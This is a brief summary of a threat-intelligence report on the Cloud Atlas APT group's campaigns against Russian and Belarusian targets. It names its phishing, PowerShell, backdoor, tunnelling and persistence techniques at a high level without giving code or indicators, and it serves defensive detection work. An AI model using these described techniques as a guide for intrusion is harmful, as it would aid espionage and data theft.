THE report discusses the recent activities of the Cloud Atlas APT group that persistently targets government entities and commercial sectors in Russia and Belarus. It reveals the use of phishing techniques with malicious shortcuts and PowerShell scripts to gain access to systems. Key payloads identified include VBCloud—a backdoor focused on data theft—and PowerShower, used for lateral movement and reconnaissance.
Techniques like patching RDP functionalities, reverse SSH tunneling, and utilizing tools such as RevSocks and Tor for maintaining persistence demonstrate the advanced methods employed by the attackers. The report also outlines specific indicators of compromise, including malicious domains, payload file paths, and forensic artifacts, which can aid in detection and response efforts against such attacks.